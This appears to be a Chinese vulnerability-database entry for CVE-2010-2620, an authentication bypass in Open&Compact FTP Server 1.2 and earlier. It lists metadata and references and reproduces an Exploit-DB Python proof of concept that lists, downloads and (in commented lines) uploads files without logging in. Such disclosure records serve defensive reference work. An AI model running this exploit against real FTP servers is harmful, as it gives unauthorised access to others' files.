Open-FTPD多个授权问题漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1119516 漏洞类型 授权问题
发布时间 2010-06-18 更新时间 2013-08-13
CVE编号 CVE-2010-2620 CNNVD-ID CNNVD-201007-024
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/13932
https://www.securityfocus.com/bid/41479
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201007-024
|漏洞详情
Open&CompactFTPServer是一款小型的FTP服务器。Open-FTPD1.2及其之前版本存在安全认证绕过漏洞。攻击者不需要登陆,通过提交恶意的(1)LIST(2)RETR(3)STOR及其它命令可以获取权限提升。
|漏洞EXP
# Exploit Title: Open&Compact Ftp Server <= 1.2 Full System Access
# Date: June 12, 2010
# Author: Serge Gorbunov
# Software Link: http://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3
#!/usr/bin/python

# Simply by omitting login process to the open ftp server it is possible
# to execute any command, including but not limited to: listing files,
# retrieving files, storing files. 
# Below is an example of a few commands. 
# If you want to test storing files with no authentication, create a 
# test file and uncomment out line with ftp.storbinary function call.

# Any command will work as long as there is at least on user who has the permission
# to execute that command. For example, storing files will work as long
# as there is one user with write permission. No matter whom it is. 

import ftplib
import os

# Connect to server
ftp = ftplib.FTP( "127.0.0.1" )
ftp.set_pasv( False ) 

# Note that we need no authentication at all!! 

print ftp.retrlines( 'LIST' )
print ftp.retrbinary('RETR changelog.txt', open('changelog.txt', 'wb').write ) 

# filename = 'test.txt'
# f = open( filename, 'rb' ) 
# print ftp.storbinary( 'STOR ' + filename, f )
# f.close()

ftp.quit()
|受影响的产品
Open-FTPD Open-FTPD 1.2
|参考资料

来源:EXPLOIT-DB
名称:13932
链接:http://www.exploit-db.com/exploits/13932
来源:SECUNIA
名称:40284
链接:http://secunia.com/advisories/40284